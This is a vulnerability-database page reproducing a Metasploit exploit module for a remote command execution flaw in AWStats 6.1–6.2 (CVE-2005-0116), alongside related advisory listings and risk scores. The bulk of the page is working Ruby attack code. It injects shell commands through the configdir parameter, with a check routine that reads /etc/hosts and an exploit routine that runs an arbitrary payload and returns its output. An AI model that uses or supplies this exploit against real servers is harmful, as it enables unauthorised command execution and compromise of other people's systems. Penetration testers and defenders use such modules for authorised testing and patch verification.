AWStats configdir Remote Command Execution

🗓️ 30 Oct 2009 00:00:00Reported by Matteo CantoniType

packetstorm🔗 packetstormsecurity.com👁 52 Views

AWStats configdir Remote Command Execution. Arbitrary command execution in AWStats CGI script

Reporter	Title	Published	Views	Family All 35
FreeBSD	awstats -- remote command execution vulnerability	21 Oct 200400:00	–	freebsd
Tenable Nessus	AWStats < 6.3 awstats.pl configdir Parameter Remote Command Execution	18 Jan 200500:00	–	nessus
Tenable Nessus	AWStats awstats.pl configdir Parameter Arbitrary Command Execution	18 Jan 200500:00	–	nessus
Tenable Nessus	FreeBSD : awstats -- remote command execution vulnerability (0f5a2b4d-694b-11d9-a9e7-0001020eed82)	13 Jul 200500:00	–	nessus
Tenable Nessus	GLSA-200501-36 : AWStats: Remote code execution	14 Feb 200500:00	–	nessus
CVE	CAN-2005-0116	6 Aug 202409:42	–	cve
CVE	CVE-2005-0116	19 Jan 200505:00	–	cve
Circl	CVE-2005-0116	26 Dec 200900:00	–	circl
Check Point Advisories	Update Protection against AWStats Remote Command Execution Vulnerability	5 Jul 200600:00	–	checkpoint_advisories
Check Point Advisories	AWStats configdir Parameter Remote Command Execution (CVE-2005-0116; CVE-2005-0362)	24 Nov 201400:00	–	checkpoint_advisories

`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'AWStats configdir Remote Command Execution',  
'Description' => %q{  
This module exploits an arbitrary command execution vulnerability in the  
AWStats CGI script. iDEFENSE has confirmed that AWStats versions 6.1 and 6.2  
are vulnerable.  
},  
'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>', 'hdm' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision$',  
'References' =>  
[  
['CVE', '2005-0116'],  
['OSVDB', '13002'],  
['BID', '12298'],  
['URL', 'http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities'],  
],  
'Privileged' => false,  
'Payload' =>  
{  
'DisableNops' => true,  
'Space' => 512,  
'Compat' =>  
{  
'PayloadType' => 'cmd',  
'RequiredCmd' => 'generic perl ruby bash telnet',  
}  
},   
'Platform' => 'unix',  
'Arch' => ARCH_CMD,  
'Targets' => [[ 'Automatic', { }]],  
'DisclosureDate' => 'Jan 15 2005',  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('URI', [true, "The full URI path to awstats.pl", "/cgi-bin/awstats.pl"]),  
], self.class)  
end  
  
def check  
res = send_request_cgi({  
'uri' => datastore['URI'],  
'vars_get' =>  
{  
'configdir' => '|echo;cat /etc/hosts;echo|'  
}  
}, 25)  
  
if (res and res.body.match(/localhost/))  
return Exploit::CheckCode::Vulnerable  
end  
  
return Exploit::CheckCode::Safe  
end  
  
def exploit  
command = Rex::Text.uri_encode(payload.encoded)  
urlconfigdir = datastore['URI'] + "?configdir=|echo;echo%20YYY;#{command};echo%20YYY;echo|"  
  
res = send_request_raw({  
'uri' => urlconfigdir,  
'method' => 'GET',  
'headers' =>  
{  
'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',  
'Connection' => 'Close',  
}  
}, 25)  
  
if (res)  
print_status("The server returned: #{res.code} #{res.message}")  
  
m = res.body.match(/YYY\n(.*)\nYYY/m)  
  
if (m)  
print_status("Command output from the server:")  
print("\n" + m[1] + "\n\n")  
else  
print_status("This server may not be vulnerable")  
end  
else  
print_status("No response from the server")  
end  
end  
  
end  
  
`

30 Oct 2009 00:00Current

0.3Low risk

Vulners AI Score0.3

EPSS0.91976